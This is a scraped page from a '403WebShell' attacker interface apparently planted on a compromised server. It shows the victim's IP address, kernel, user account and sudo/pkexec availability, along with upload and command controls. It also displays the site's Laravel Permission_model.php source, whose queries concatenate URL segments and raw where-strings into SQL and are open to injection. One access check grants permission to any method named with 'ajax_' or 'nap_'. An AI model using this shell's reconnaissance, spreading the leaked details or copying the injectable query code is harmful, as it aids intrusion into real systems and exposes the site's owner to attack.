Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/ats.isankalpa.org/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/ats.isankalpa.org/app/Permission_model.php
<?php

namespace App;

use Illuminate\Database\Eloquent\Model;
use Illuminate\Support\Facades\DB;

class Permission_model extends Model
{
    
   private $menu_table, $menu_permit_table, $users_table, $user_type_table;

   public function __construct()
   {
      $this->menu_table         = config( 'app.CUSTOM_CONFIG.DB_TABLES.MENU_TABLE' );
      $this->menu_permit_table  = config( 'app.CUSTOM_CONFIG.DB_TABLES.MENU_PERMIT_TABLE' );
      $this->users_table        = config( 'app.CUSTOM_CONFIG.DB_TABLES.USERS_TABLE' );
      $this->user_type_table    = config( 'app.CUSTOM_CONFIG.DB_TABLES.USER_TYPE_TABLE' );
   }


	 /******
    * This method will fetch all records from the db. 
    * 
    * @param string $s_where, ex- " status=1 AND deleted=0 " 
    * @param int $i_start, starting value for pagination
    * @param int $i_limit, number of records to fetch used for pagination
    * @returns array
    */
    public function fetch_multi( $s_where = null, $i_start = null, $i_limit = null )
    {
        $ret_= array();
		
		    $s_qry = "SELECT * FROM ".$this->menu_permit_table." n "
                .($s_where!=""?$s_where:"" ).(is_numeric($i_start) && is_numeric($i_limit)?" Limit ".intval($i_start).",".intval($i_limit):"" );
          $rs  = DB::select( $s_qry );

          $i_cnt = 0;

          if( count( $rs ) > 0 )
          {
              foreach($rs as $row)
              {
                  $ret_[$i_cnt]["id"] 		= $row->i_id;////always integer
                  $ret_[$i_cnt]["s_name"] 	= stripslashes(htmlspecialchars_decode($row->s_name));    
				  $ret_[$i_cnt]["s_link"] 	= stripslashes(htmlspecialchars_decode($row->s_link));                
                  $i_cnt++;
              }          
          }
          unset($s_qry,$rs,$row,$i_cnt,$s_where,$i_start,$i_limit, $s_desc);
          return $ret_;
    }


	/****
    * Fetch Total records
    * @param string $s_where, ex- " status=1 AND deleted=0 " 
    * @returns int on success and FALSE if failed 
    */
    public function gettotal_info( $s_where = null )
    {
        $ret_	= 0;
        $s_qry	= "Select count(*) as i_total From ".$this->menu_permit_table." n ".($s_where!=""?$s_where:"" );
        $rs 	= DB::select( $s_qry );
        $i_cnt	= 0;

        if( count( $rs ) > 0 )
        {
            foreach($rs as $row)
                $ret_=intval($row->i_total); 
        }

        unset( $s_qry,$rs,$row,$i_cnt,$s_where );
        return $ret_;
    }


    /*******
    * Fetches One record from db for the id value.
    * 
    * @param int $i_id
    * @returns array
    */
    public function fetch_this( $i_id )
    {
        $ret_=array();
          
        $s_qry="Select * From ".$this->tbl." AS n Where n.i_id=". ( intval( $i_id ) );

        $rs = DB::select( $s_qry );
            		  
      	if( COUNT( $rs ) > 0 )
      	{
          	foreach( $rs as $row )
          	{			  
             	$ret_["id"]		= $row->i_id;////always integer
              	$ret_["s_name"]	= stripslashes(htmlspecialchars_decode($row->s_name)); 
			  	$ret_["s_link"]	= stripslashes(htmlspecialchars_decode($row->s_link));              
          	}         
      	}
      	unset($s_qry,$rs,$row,$i_id);
      	return $ret_;
    }  



	/****
    * can_user_access having access rights to control them. 
    * Company controller cannot be edited or deleted because in some of php scripts
    * the company id used are hardcodded.
    * 
    * @param int $i_user_id, user type; 0=> super admin
    * @returns array of menu controllers 
    */
	
	public function can_user_access_using_user_type( $i_user_type_id = null, $s_url )
  {	



		$i_user_type_id = intval( $i_user_type_id );
		$s_check_url 		= explode( '/', str_replace( url( '/' ),"",$s_url ) ); 
		$controller     = $s_check_url[1];
		$method 			  = isset($s_check_url[2])?$s_check_url[2]:'';
				
		if( $method == 'index' ) $method = '';
		
		$sql = "SELECT COUNT(*) AS i_total 
				    FROM {$this->menu_permit_table} 
				    WHERE (i_user_type = {$i_user_type_id} AND s_link LIKE '".$controller.'/'.$method."%') 
                  OR ((s_link LIKE '".$method."%') AND s_action='Default')
						      OR ('".$method."' LIKE '%ajax_%'  OR '".$method."' LIKE '%nap_%') ";

    /* OR ((s_link LIKE '".$controller."%' OR s_link LIKE '".$method."%') AND s_action='Default') */
		                   
        $row = DB::select( $sql ); 
        if( COUNT( $row ) > 0 )
      	{ 
			     return $row[0]->i_total > 0 ? true : false;   
      	}
      	return false;
  }   	

		

	/* fetch contorols depending on user access */
	public function fetching_access_control_using_user_type( $s_where = null )
    {

		$ret_ = array();	

		$s_qry = " SELECT * From ".$this->menu_permit_table;
		$s_qry.= " WHERE (i_user_type= '". $s_where['i_user_id'] ."' And (s_link LIKE '".$s_where["controller"]."/%' 
						OR s_link LIKE '".$s_where["alias_controller"]."/%')) 
						OR ((s_link LIKE '".$s_where["controller"]."/%' OR s_link LIKE '".$s_where["alias_controller"]."/%') And s_action='Default' )";                            
		//echo $s_qry; exit;
		$rs = DB::select( $s_qry );

		if( COUNT( $rs ) > 0 )
      	{
			//$row = $rs->toArray(); 

			foreach( $rs as $value )
			{
				$ret_[$value->s_action] = $value->s_link;
			}
		}
		return $ret_;                 
    }   	
}

Youez - 2016 - github.com/yon3zu
LinuXploit